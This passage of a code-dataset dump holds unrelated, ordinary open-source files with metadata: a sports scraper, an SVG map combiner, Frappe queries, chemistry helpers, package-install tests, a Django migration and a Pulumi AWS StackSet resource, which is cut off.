homogeneous matrix #Write to parameter server for transparancy | 2.452056 | 2 |
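A standalone round-trip check of the matrix helpers used above (requires the ROS tf package, as in the node; the translation and yaw values are arbitrary):

import numpy as np
import tf.transformations as tr

# Same construction as pose_to_matrix()/transform_to_matrix() in the node above
trans = (1.0, 2.0, 0.0)
rot = tr.quaternion_from_euler(0, 0, np.pi / 2)
M = np.dot(tr.translation_matrix(trans), tr.quaternion_matrix(rot))
# And the inverse direction used by matrix_to_transform()
assert np.allclose(tr.translation_from_matrix(M), trans)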
gen_data/get_teams.py | wusui/NCAA2019 | 0 | 8059 | #!/usr/bin/python
# pylint: disable=W0223
"""
Get a list of teams
"""
from html.parser import HTMLParser
import requests
class ChkTeams(HTMLParser):
"""
Extract team names from page
"""
def __init__(self):
HTMLParser.__init__(self)
self.retval = []
def handle_starttag(self, tag, attrs):
for apt in attrs:
if apt[0] == 'title':
if apt[1] != "ESPN Search":
self.retval.append(apt[1])
DATALOC = "http://www.espn.com/mens-college-basketball/tournament/bracket"
def check_teams():
"""
Extract a list of teams (schools)
"""
req = requests.get(DATALOC)
parser = ChkTeams()
parser.feed(req.text)
retv = parser.retval
return retv[8:]
def make_team_list():
"""
Call check_teams and stick result in text file
"""
listv = check_teams()
with open('teams.txt', 'w') as ofile:
for team in listv:
ofile.write(team + '\n')
if __name__ == '__main__':
make_team_list()
| #!/usr/bin/python
# pylint: disable=W0223
"""
Get a list of teams
"""
from html.parser import HTMLParser
import requests
class ChkTeams(HTMLParser):
"""
Extract team names from page
"""
def __init__(self):
HTMLParser.__init__(self)
self.retval = []
def handle_starttag(self, tag, attrs):
for apt in attrs:
if apt[0] == 'title':
if apt[1] != "ESPN Search":
self.retval.append(apt[1])
DATALOC = "http://www.espn.com/mens-college-basketball/tournament/bracket"
def check_teams():
"""
Extract a list of teams (schools)
"""
req = requests.get(DATALOC)
parser = ChkTeams()
parser.feed(req.text)
retv = parser.retval
return retv[8:]
def make_team_list():
"""
Call check_teams and stick result in text file
"""
listv = check_teams()
with open('teams.txt', 'w') as ofile:
for team in listv:
ofile.write(team + '\n')
if __name__ == '__main__':
make_team_list()
| en | 0.723916 | #!/usr/bin/python # pylint: disable=W0223 Get a list of teams Extract team names from page Extract a list of teams (schools) Call check_teams and stick result in text file | 3.30506 | 3 |
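The title-extraction logic above can be checked offline; a small sketch (the HTML string is invented, ChkTeams is the class defined in the file):

parser = ChkTeams()
parser.feed('<a title="ESPN Search">x</a><a title="Duke Blue Devils">x</a>')
print(parser.retval)  # ['Duke Blue Devils'] -- the "ESPN Search" entry is filtered out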
svgserver/app.py | omniscale/svgserver | 2 | 8060 | <reponame>omniscale/svgserver
import codecs
import tempfile
from contextlib import closing
from .cgi import CGIClient
from .combine import CombineSVG
from .mapserv import MapServer, InternalError
from .tree import build_tree
def _recursive_add_layer(nodes, params, svg, mapserver, translations):
for node in nodes:
group_name = format_group_name(node, translations)
svg.push_group(group_name)
if node.layer:
params["layers"] = node.layer
params["format"] = "image/svg+xml"
resp = mapserver.get(params)
if resp.headers["Content-type"] != "image/svg+xml":
raise InternalError(
"received non SVG response for layer %s:\n%s\n%s"
% (node.layer, resp.headers, resp.read())
)
svg.add(resp)
if node.subs:
_recursive_add_layer(node.subs, params, svg, mapserver, translations)
svg.pop_group()
def format_group_name(node, translations):
if isinstance(node.name, tuple):
return ', '.join(translations.get(n, n) for n in node.name)
return translations.get(node.name, node.name)
def layered_svg(params, translations={}, mapserver_binary="mapserv", root_id='map'):
mapserver = MapServer(binary=mapserver_binary)
layers = mapserver.layer_names(params)
nodes = build_tree(layers)
root_id = translations.get(root_id, root_id)
f = tempfile.TemporaryFile()
try:
with CombineSVG(f, root_id=root_id) as svg:
_recursive_add_layer(
nodes,
params=params,
svg=svg,
mapserver=mapserver,
translations=translations,
)
f.seek(0)
return f
except:
# close to remove temporary file
f.close()
raise
def load_translations(filename):
if not filename:
return {}
translations = {}
with codecs.open(filename, encoding="utf8") as f:
for line in f:
line = line.strip()
if not line or line.startswith('#'):
continue
if '=' not in line:
continue
key, translation = line.split('=', 1)
translations[key.strip()] = translation.strip()
return translations
if __name__ == "__main__":
import os
import logging
logging.basicConfig(level=logging.DEBUG)
params = {
"service": "WMS",
"version": "1.1.1",
"request": "GetMap",
"width": 1234,
"height": 769,
"srs": "EPSG:3857",
"styles": "",
"format": "image/svg+xml",
"bbox": "775214.9923087133,6721788.224989068,776688.4414913012,6722705.993822992",
"map": os.path.abspath(os.path.dirname(__file__) + "/../tests/ms.map"),
}
with closing(layered_svg(params)) as f:
print(f.read())
| import codecs
import tempfile
from contextlib import closing
from .cgi import CGIClient
from .combine import CombineSVG
from .mapserv import MapServer, InternalError
from .tree import build_tree
def _recursive_add_layer(nodes, params, svg, mapserver, translations):
for node in nodes:
group_name = format_group_name(node, translations)
svg.push_group(group_name)
if node.layer:
params["layers"] = node.layer
params["format"] = "image/svg+xml"
resp = mapserver.get(params)
if resp.headers["Content-type"] != "image/svg+xml":
raise InternalError(
"received non SVG response for layer %s:\n%s\n%s"
% (node.layer, resp.headers, resp.read())
)
svg.add(resp)
if node.subs:
_recursive_add_layer(node.subs, params, svg, mapserver, translations)
svg.pop_group()
def format_group_name(node, translations):
if isinstance(node.name, tuple):
return ', '.join(translations.get(n, n) for n in node.name)
return translations.get(node.name, node.name)
def layered_svg(params, translations={}, mapserver_binary="mapserv", root_id='map'):
mapserver = MapServer(binary=mapserver_binary)
layers = mapserver.layer_names(params)
nodes = build_tree(layers)
root_id = translations.get(root_id, root_id)
f = tempfile.TemporaryFile()
try:
with CombineSVG(f, root_id=root_id) as svg:
_recursive_add_layer(
nodes,
params=params,
svg=svg,
mapserver=mapserver,
translations=translations,
)
f.seek(0)
return f
except:
# close to remove temporary file
f.close()
raise
def load_translations(filename):
if not filename:
return {}
translations = {}
with codecs.open(filename, encoding="utf8") as f:
for line in f:
line = line.strip()
if not line or line.startswith('#'):
continue
if '=' not in line:
continue
key, translation = line.split('=', 1)
translations[key.strip()] = translation.strip()
return translations
if __name__ == "__main__":
import os
import logging
logging.basicConfig(level=logging.DEBUG)
params = {
"service": "WMS",
"version": "1.1.1",
"request": "GetMap",
"width": 1234,
"height": 769,
"srs": "EPSG:3857",
"styles": "",
"format": "image/svg+xml",
"bbox": "775214.9923087133,6721788.224989068,776688.4414913012,6722705.993822992",
"map": os.path.abspath(os.path.dirname(__file__) + "/../tests/ms.map"),
}
with closing(layered_svg(params)) as f:
print(f.read()) | en | 0.742444 | # close to remove temporary file | 2.275507 | 2 |
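A usage sketch for load_translations() above (the file contents are invented; the `key = value` and '#'-comment format follows the parser):

import tempfile

with tempfile.NamedTemporaryFile('w', suffix='.txt', delete=False, encoding='utf8') as f:
    f.write("# blank lines and '#' comments are skipped\n")
    f.write("roads = Roads\n")
    f.write("buildings = Buildings\n")

print(load_translations(f.name))  # {'roads': 'Roads', 'buildings': 'Buildings'}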
11_app/script/purchase_order.py | israillaky/ERPOSAPP11 | 0 | 8061 | import frappe
@frappe.whitelist()
def filt_itemby_supplier(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""Select parent from `tabItem Supplier` where supplier= %s""",(filters.get("supplier")));
@frappe.whitelist()
def filteritem(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""select item_code, item_name, item_group, volume, item_type,stock_uom from `tabItem`"""); | import frappe
@frappe.whitelist()
def filt_itemby_supplier(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""Select parent from `tabItem Supplier` where supplier= %s""",(filters.get("supplier")));
@frappe.whitelist()
def filteritem(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""select item_code, item_name, item_group, volume, item_type,stock_uom from `tabItem`"""); | en | 0.368554 | Select parent from `tabItem Supplier` where supplier= %s select item_code, item_name, item_group, volume, item_type,stock_uom from `tabItem` | 1.804717 | 2 |
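For context, the two functions follow the signature Frappe expects for custom query methods; called directly inside a Frappe site context they would look like this (the filter value is made up):

rows = filt_itemby_supplier("Item", "", "name", 0, 20, {"supplier": "SUP-0001"})
items = filteritem("Item", "", "name", 0, 20, {})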
src/common/bio/smiles.py | duttaprat/proteinGAN | 8 | 8062 | from common.bio.constants import SMILES_CHARACTER_TO_ID, ID_TO_SMILES_CHARACTER
def from_smiles_to_id(data, column):
"""Converts sequences from smiles to ids
Args:
data: data that contains characters that need to be converted to ids
column: a column of the dataframe that contains characters that need to be converted to ids
Returns:
array of ids
"""
return [[SMILES_CHARACTER_TO_ID[char] for char in val] for index, val in data[column].iteritems()]
def from_id_from_smiles(data, column):
"""Converts sequences from ids to smiles characters
Args:
data: data that contains ids that need to be converted to characters
column: a column of the dataframe that contains ids that need to be converted to characters
Returns:
array of characters
"""
return [[ID_TO_SMILES_CHARACTER[id] for id in val] for index, val in data[column].iteritems()]
| from common.bio.constants import SMILES_CHARACTER_TO_ID, ID_TO_SMILES_CHARACTER
def from_smiles_to_id(data, column):
"""Converts sequences from smiles to ids
Args:
data: data that contains characters that need to be converted to ids
column: a column of the dataframe that contains characters that need to be converted to ids
Returns:
array of ids
"""
return [[SMILES_CHARACTER_TO_ID[char] for char in val] for index, val in data[column].iteritems()]
def from_id_from_smiles(data, column):
"""Converts sequences from ids to smiles characters
Args:
data: data that contains ids that need to be converted to characters
column: a column of the dataframe that contains ids that need to be converted to characters
Returns:
array of characters
"""
return [[ID_TO_SMILES_CHARACTER[id] for id in val] for index, val in data[column].iteritems()]
| en | 0.885739 | Converts sequences from smiles to ids Args: data: data that contains characters that need to be converted to ids column: a column of the dataframe that contains characters that need to be converted to ids Returns: array of ids Converts sequences from ids to smiles characters Args: data: data that contains ids that need to be converted to characters column: a column of the dataframe that contains ids that need to be converted to characters Returns: array of characters | 3.250393 | 3 |
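A usage sketch for the converters above (assumes a pandas DataFrame and that SMILES_CHARACTER_TO_ID covers the characters used; note the code relies on the older Series.iteritems() API):

import pandas as pd

df = pd.DataFrame({"smiles": ["CCO", "C=O"]})
ids = from_smiles_to_id(df, "smiles")  # e.g. [[id of 'C', id of 'C', id of 'O'], [id of 'C', id of '=', id of 'O']]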
test/lib_config_test.py | yokoyama-flogics/ibp_monitor_2 | 3 | 8063 | import os
import sys
import unittest
# Set Python search path to the parent directory
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from lib.config import *
class TestLibConfig(unittest.TestCase):
def test_config_noconfigfile(self):
config = BeaconConfigParser('not_exist.cfg')
with self.assertRaises(ConfigParser.NoSectionError):
config.getpath('Test', 'dbdir')
def test_config_default(self):
import os
os.environ['HOME'] = 'notexist'
config = BeaconConfigParser()
with self.assertRaises(ConfigParser.NoSectionError):
config.get('Signal', 'samplerate')
def test_config_items(self):
config = BeaconConfigParser('test_config.cfg')
self.assertEqual(config.get('Test', 'dbdir'), 'nodb')
self.assertEqual(config.getpath('Test', 'dbdir'), 'nodb')
self.assertEqual(config.getint('Signal', 'samplerate'), 16000)
if __name__ == "__main__":
unittest.main(buffer=True)
| import os
import sys
import unittest
# Set Python search path to the parent directory
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from lib.config import *
class TestLibConfig(unittest.TestCase):
def test_config_noconfigfile(self):
config = BeaconConfigParser('not_exist.cfg')
with self.assertRaises(ConfigParser.NoSectionError):
config.getpath('Test', 'dbdir')
def test_config_default(self):
import os
os.environ['HOME'] = 'notexist'
config = BeaconConfigParser()
with self.assertRaises(ConfigParser.NoSectionError):
config.get('Signal', 'samplerate')
def test_config_items(self):
config = BeaconConfigParser('test_config.cfg')
self.assertEqual(config.get('Test', 'dbdir'), 'nodb')
self.assertEqual(config.getpath('Test', 'dbdir'), 'nodb')
self.assertEqual(config.getint('Signal', 'samplerate'), 16000)
if __name__ == "__main__":
unittest.main(buffer=True)
| en | 0.606285 | # Set Python search path to the parent directory | 2.786767 | 3 |
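The assertions above imply a test_config.cfg of roughly this shape (reconstructed from the test, not taken from the repository):

[Test]
dbdir = nodb

[Signal]
samplerate = 16000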
tests/test_installation.py | phdye/nimporter | 0 | 8064 | <reponame>phdye/nimporter
"""
Test to make sure that libraries built with Nimporter can be installed via Pip.
"""
import sys, os, subprocess, shutil, pkg_resources, json, warnings
from pathlib import Path
import pytest
import nimporter
PYTHON = 'python' if sys.platform == 'win32' else 'python3'
PIP = 'pip' if shutil.which('pip') else 'pip3'
@pytest.mark.integration_test
def test_ensure_nimporter_installed():
"Make sure that Nimporter is installed before running integration tests."
libs = {lib.key.lower() for lib in pkg_resources.working_set}
assert 'nimporter' in libs, (
f'Nimporter is not installed. Please install via:'
f'`{PIP} install .` before running the integration tests.'
)
@pytest.mark.integration_test
def test_create_sdist():
"Test the successful creation of a source distribution."
with nimporter.cd('tests/proj1'):
subprocess.Popen(f'{PYTHON} setup.py sdist'.split()).wait()
dist = Path('dist')
egg = Path('project1.egg-info')
try:
assert dist.exists()
assert egg.exists()
targets = list(dist.glob('project1*'))
assert len(targets) == 1
assert targets[0].exists()
# Make sure the appropriate compiler is being used
for extension in Path('nim-extensions').iterdir():
(nim_build_data_file,) = extension.glob('*json')
nim_build_data = json.loads(nim_build_data_file.read_text())
expected = nimporter.NimCompiler.get_compatible_compiler()
installed_ccs = nimporter.NimCompiler.get_installed_compilers()
if not expected:
warnings.warn(
f'No compatible C compiler installed: {installed_ccs}'
)
else:
cc_path = installed_ccs[expected]
actual = nim_build_data['linkcmd'].split()[0].strip()
if not actual.startswith(cc_path.stem):
warnings.warn(
f'Nim used a different C compiler than what Python '
f'expects. Python uses {cc_path.stem} and Nim used '
f'{actual}'
)
finally:
shutil.rmtree(str(dist.absolute()))
shutil.rmtree(str(egg.absolute()))
@pytest.mark.integration_test
def test_create_bdist():
"Test the successful create of a wheel."
with nimporter.cd('tests/proj1'):
subprocess.Popen(f'{PYTHON} setup.py bdist_wheel'.split()).wait()
dist = Path('dist')
build = Path('build')
egg = Path('project1.egg-info')
try:
assert dist.exists()
assert build.exists()
assert egg.exists()
targets = list(Path('dist').glob('project1*.whl'))
assert len(targets) == 1
assert targets[0].exists()
# Make sure the appropriate compiler is being used
for extension in Path('nim-extensions').iterdir():
(nim_build_data_file,) = extension.glob('*json')
nim_build_data = json.loads(nim_build_data_file.read_text())
expected = nimporter.NimCompiler.get_compatible_compiler()
installed_ccs = nimporter.NimCompiler.get_installed_compilers()
if not expected:
warnings.warn(
f'No compatible C compiler installed: {installed_ccs}'
)
else:
cc_path = installed_ccs[expected]
actual = nim_build_data['linkcmd'].split()[0].strip()
if not actual.startswith(cc_path.stem):
warnings.warn(
f'Nim used a different C compiler than what Python '
f'expects. Python uses {cc_path.stem} and Nim used '
f'{actual}'
)
finally:
shutil.rmtree(str(dist.absolute()))
shutil.rmtree(str(build.absolute()))
shutil.rmtree(str(egg.absolute()))
@pytest.mark.slow_integration_test
def test_install_sdist():
"Make sure that the project can be installed by Pip"
with nimporter.cd('tests/proj1'):
subprocess.Popen(f'{PYTHON} setup.py sdist'.split()).wait()
dist = Path('dist')
egg = Path('project1.egg-info')
try:
assert dist.exists()
assert egg.exists()
targets = list(dist.glob('project1*'))
assert len(targets) == 1
(target,) = targets
assert target.exists()
subprocess.Popen(f'{PIP} install {target}'.split()).wait()
finally:
shutil.rmtree(str(dist.absolute()))
shutil.rmtree(str(egg.absolute()))
# Make sure that `tests/proj1` is not imported as a SimpleNamespace and that
# the installed library in `site-packages` is used.
with nimporter.cd('../..'):
try:
import proj1
assert proj1
import proj1.performance
assert proj1.performance
import proj1.lib1
assert proj1.lib1
assert proj1.foo
assert proj1.bar
assert proj1.baz
assert proj1.baz() == 1
except Exception as e:
warnings.warn(str(e))
# Cannot delete a DLL in use by another process on Windows
if sys.platform != 'win32':
subprocess.Popen(f'{PIP} uninstall project1 -y'.split()).wait()
@pytest.mark.slow_integration_test
def test_install_bdist():
"Make sure that the wheel can be installed by Pip"
with nimporter.cd('tests/proj1'):
subprocess.Popen(f'{PYTHON} setup.py bdist_wheel'.split()).wait()
dist = Path('dist')
build = Path('build')
egg = Path('project1.egg-info')
try:
assert dist.exists()
assert build.exists()
assert egg.exists()
targets = list(Path('dist').glob('project1*.whl'))
assert len(targets) == 1
wheel = targets[0]
assert wheel.exists()
subprocess.Popen(f'{PIP} install {wheel}'.split()).wait()
finally:
shutil.rmtree(str(dist.absolute()))
shutil.rmtree(str(build.absolute()))
shutil.rmtree(str(egg.absolute()))
# Make sure that `tests/proj1` is not imported as a SimpleNamespace and that
# the installed library in `site-packages` is used.
with nimporter.cd('../..'):
try:
import proj1
assert proj1
import proj1.performance
assert proj1.performance
import proj1.lib1
assert proj1.lib1
assert proj1.foo
assert proj1.bar
assert proj1.baz
assert proj1.baz() == 1
except Exception as e:
warnings.warn(str(e))
# Cannot delete a DLL in use by another process on Windows
if sys.platform != 'win32':
subprocess.Popen(f'{PIP} uninstall project1 -y'.split()).wait()
| """
Test to make sure that libraries built with Nimporter can be installed via Pip.
"""
import sys, os, subprocess, shutil, pkg_resources, json, warnings
from pathlib import Path
import pytest
import nimporter
PYTHON = 'python' if sys.platform == 'win32' else 'python3'
PIP = 'pip' if shutil.which('pip') else 'pip3'
@pytest.mark.integration_test
def test_ensure_nimporter_installed():
"Make sure that Nimporter is installed before running integration tests."
libs = {lib.key.lower() for lib in pkg_resources.working_set}
assert 'nimporter' in libs, (
f'Nimporter is not installed. Please install via:'
f'`{PIP} install .` before running the integration tests.'
)
@pytest.mark.integration_test
def test_create_sdist():
"Test the successful creation of a source distribution."
with nimporter.cd('tests/proj1'):
subprocess.Popen(f'{PYTHON} setup.py sdist'.split()).wait()
dist = Path('dist')
egg = Path('project1.egg-info')
try:
assert dist.exists()
assert egg.exists()
targets = list(dist.glob('project1*'))
assert len(targets) == 1
assert targets[0].exists()
# Make sure the appropriate compiler is being used
for extension in Path('nim-extensions').iterdir():
(nim_build_data_file,) = extension.glob('*json')
nim_build_data = json.loads(nim_build_data_file.read_text())
expected = nimporter.NimCompiler.get_compatible_compiler()
installed_ccs = nimporter.NimCompiler.get_installed_compilers()
if not expected:
warnings.warn(
f'No compatible C compiler installed: {installed_ccs}'
)
else:
cc_path = installed_ccs[expected]
actual = nim_build_data['linkcmd'].split()[0].strip()
if not actual.startswith(cc_path.stem):
warnings.warn(
f'Nim used a different C compiler than what Python '
f'expects. Python uses {cc_path.stem} and Nim used '
f'{actual}'
)
finally:
shutil.rmtree(str(dist.absolute()))
shutil.rmtree(str(egg.absolute()))
@pytest.mark.integration_test
def test_create_bdist():
"Test the successful create of a wheel."
with nimporter.cd('tests/proj1'):
subprocess.Popen(f'{PYTHON} setup.py bdist_wheel'.split()).wait()
dist = Path('dist')
build = Path('build')
egg = Path('project1.egg-info')
try:
assert dist.exists()
assert build.exists()
assert egg.exists()
targets = list(Path('dist').glob('project1*.whl'))
assert len(targets) == 1
assert targets[0].exists()
# Make sure the appropriate compiler is being used
for extension in Path('nim-extensions').iterdir():
(nim_build_data_file,) = extension.glob('*json')
nim_build_data = json.loads(nim_build_data_file.read_text())
expected = nimporter.NimCompiler.get_compatible_compiler()
installed_ccs = nimporter.NimCompiler.get_installed_compilers()
if not expected:
warnings.warn(
f'No compatible C compiler installed: {installed_ccs}'
)
else:
cc_path = installed_ccs[expected]
actual = nim_build_data['linkcmd'].split()[0].strip()
if not actual.startswith(cc_path.stem):
warnings.warn(
f'Nim used a different C compiler than what Python '
f'expects. Python uses {cc_path.stem} and Nim used '
f'{actual}'
)
finally:
shutil.rmtree(str(dist.absolute()))
shutil.rmtree(str(build.absolute()))
shutil.rmtree(str(egg.absolute()))
@pytest.mark.slow_integration_test
def test_install_sdist():
"Make sure that the project can be installed by Pip"
with nimporter.cd('tests/proj1'):
subprocess.Popen(f'{PYTHON} setup.py sdist'.split()).wait()
dist = Path('dist')
egg = Path('project1.egg-info')
try:
assert dist.exists()
assert egg.exists()
targets = list(dist.glob('project1*'))
assert len(targets) == 1
(target,) = targets
assert target.exists()
subprocess.Popen(f'{PIP} install {target}'.split()).wait()
finally:
shutil.rmtree(str(dist.absolute()))
shutil.rmtree(str(egg.absolute()))
# Make sure that `tests/proj1` is not imported as a SimpleNamespace and that
# the installed library in `site-packages` is used.
with nimporter.cd('../..'):
try:
import proj1
assert proj1
import proj1.performance
assert proj1.performance
import proj1.lib1
assert proj1.lib1
assert proj1.foo
assert proj1.bar
assert proj1.baz
assert proj1.baz() == 1
except Exception as e:
warnings.warn(str(e))
# Cannot delete a DLL in use by another process on Windows
if sys.platform != 'win32':
subprocess.Popen(f'{PIP} uninstall project1 -y'.split()).wait()
@pytest.mark.slow_integration_test
def test_install_bdist():
"Make sure that the wheel can be installed by Pip"
with nimporter.cd('tests/proj1'):
subprocess.Popen(f'{PYTHON} setup.py bdist_wheel'.split()).wait()
dist = Path('dist')
build = Path('build')
egg = Path('project1.egg-info')
try:
assert dist.exists()
assert build.exists()
assert egg.exists()
targets = list(Path('dist').glob('project1*.whl'))
assert len(targets) == 1
wheel = targets[0]
assert wheel.exists()
subprocess.Popen(f'{PIP} install {wheel}'.split()).wait()
finally:
shutil.rmtree(str(dist.absolute()))
shutil.rmtree(str(build.absolute()))
shutil.rmtree(str(egg.absolute()))
# Make sure that `tests/proj1` is not imported as a SimpleNamespace and that
# the installed library in `site-packages` is used.
with nimporter.cd('../..'):
try:
import proj1
assert proj1
import proj1.performance
assert proj1.performance
import proj1.lib1
assert proj1.lib1
assert proj1.foo
assert proj1.bar
assert proj1.baz
assert proj1.baz() == 1
except Exception as e:
warnings.warn(str(e))
# Cannot delete a DLL in use by another process on Windows
if sys.platform != 'win32':
subprocess.Popen(f'{PIP} uninstall project1 -y'.split()).wait() | en | 0.955609 | Test to make sure that libraries built with Nimporter can be installed via Pip. # Make sure the appropriate compiler is being used # Make sure the appropriate compiler is being used # Make sure that `tests/proj1` is not imported as a SimpleNamespace and that # the installed library in `site-packages` is used. # Cannot delete a DLL in use by another process on Windows # Make sure that `tests/proj1` is not imported as a SimpleNamespace and that # the installed library in `site-packages` is used. # Cannot delete a DLL in use by another process on Windows | 2.452555 | 2 |
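Condensed, the flow that test_create_sdist/test_install_sdist automate above (assumes it is run from tests/proj1; the glob mirrors the tests' 'project1*' pattern):

import subprocess, sys
from pathlib import Path

subprocess.run([sys.executable, 'setup.py', 'sdist'], check=True)
(sdist,) = Path('dist').glob('project1*')
subprocess.run(['pip3', 'install', str(sdist)], check=True)
subprocess.run(['pip3', 'uninstall', 'project1', '-y'], check=True)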
hotpot_sample_dict.py | bvanaken/pytorch-pretrained-BERT | 1 | 8065 | <gh_stars>1-10
samples = {
"2_brother_plays": {
"question_parts": [range(1, 13), range(13, 17)],
"sp_parts": [range(20, 43), range(50, 60)]
}
}
| samples = {
"2_brother_plays": {
"question_parts": [range(1, 13), range(13, 17)],
"sp_parts": [range(20, 43), range(50, 60)]
}
} | none | 1 | 1.23568 | 1 |
|
src/applications/blog/migrations/0003_post_author.py | alexander-sidorov/tms-z43 | 2 | 8066 | <filename>src/applications/blog/migrations/0003_post_author.py
# Generated by Django 3.1.7 on 2021-03-24 17:41
import django.db.models.deletion
from django.conf import settings
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("blog", "0002_auto_20210323_1834"),
]
operations = [
migrations.AddField(
model_name="post",
name="author",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
]
| <filename>src/applications/blog/migrations/0003_post_author.py
# Generated by Django 3.1.7 on 2021-03-24 17:41
import django.db.models.deletion
from django.conf import settings
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("blog", "0002_auto_20210323_1834"),
]
operations = [
migrations.AddField(
model_name="post",
name="author",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
]
| en | 0.831672 | # Generated by Django 3.1.7 on 2021-03-24 17:41 | 1.513943 | 2 |
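The model change this migration corresponds to, roughly (the Post model itself is not shown in the file, so this is a reconstruction):

from django.conf import settings
from django.db import models

class Post(models.Model):
    author = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE,
        blank=True,
        null=True,
    )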
sdk/python/pulumi_aws/cloudformation/stack_set.py | mdop-wh/pulumi-aws | 0 | 8067 | <reponame>mdop-wh/pulumi-aws
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables
__all__ = ['StackSet']
class StackSet(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
administration_role_arn: Optional[pulumi.Input[str]] = None,
capabilities: Optional[pulumi.Input[List[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
execution_role_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
template_body: Optional[pulumi.Input[str]] = None,
template_url: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Manages a CloudFormation StackSet. StackSets allow CloudFormation templates to be easily deployed across multiple accounts and regions via StackSet Instances (`cloudformation.StackSetInstance` resource). Additional information about StackSets can be found in the [AWS CloudFormation User Guide](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/what-is-cfnstacksets.html).
> **NOTE:** All template parameters, including those with a `Default`, must be configured or ignored with the `lifecycle` configuration block `ignore_changes` argument.
> **NOTE:** All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
a_ws_cloud_formation_stack_set_administration_role_assume_role_policy = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
actions=["sts:AssumeRole"],
effect="Allow",
principals=[aws.iam.GetPolicyDocumentStatementPrincipalArgs(
identifiers=["cloudformation.amazonaws.com"],
type="Service",
)],
)])
a_ws_cloud_formation_stack_set_administration_role = aws.iam.Role("aWSCloudFormationStackSetAdministrationRole", assume_role_policy=a_ws_cloud_formation_stack_set_administration_role_assume_role_policy.json)
example = aws.cloudformation.StackSet("example",
administration_role_arn=a_ws_cloud_formation_stack_set_administration_role.arn,
parameters={
"VPCCidr": "10.0.0.0/16",
},
template_body=\"\"\"{
"Parameters" : {
"VPCCidr" : {
"Type" : "String",
"Default" : "10.0.0.0/16",
"Description" : "Enter the CIDR block for the VPC. Default is 10.0.0.0/16."
}
},
"Resources" : {
"myVpc": {
"Type" : "AWS::EC2::VPC",
"Properties" : {
"CidrBlock" : { "Ref" : "VPCCidr" },
"Tags" : [
{"Key": "Name", "Value": "Primary_CF_VPC"}
]
}
}
}
}
\"\"\")
a_ws_cloud_formation_stack_set_administration_role_execution_policy_policy_document = example.execution_role_name.apply(lambda execution_role_name: aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
actions=["sts:AssumeRole"],
effect="Allow",
resources=[f"arn:aws:iam::*:role/{execution_role_name}"],
)]))
a_ws_cloud_formation_stack_set_administration_role_execution_policy_role_policy = aws.iam.RolePolicy("aWSCloudFormationStackSetAdministrationRoleExecutionPolicyRolePolicy",
policy=a_ws_cloud_formation_stack_set_administration_role_execution_policy_policy_document.json,
role=a_ws_cloud_formation_stack_set_administration_role.name)
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] administration_role_arn: Amazon Resource Number (ARN) of the IAM Role in the administrator account.
:param pulumi.Input[List[pulumi.Input[str]]] capabilities: A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`.
:param pulumi.Input[str] description: Description of the StackSet.
:param pulumi.Input[str] execution_role_name: Name of the IAM Role in all target accounts for StackSet operations. Defaults to `AWSCloudFormationStackSetExecutionRole`.
:param pulumi.Input[str] name: Name of the StackSet. The name must be unique in the region where you create your StackSet. The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified.
:param pulumi.Input[str] template_body: String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`.
:param pulumi.Input[str] template_url: String containing the location of a file containing the CloudFormation template body. The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
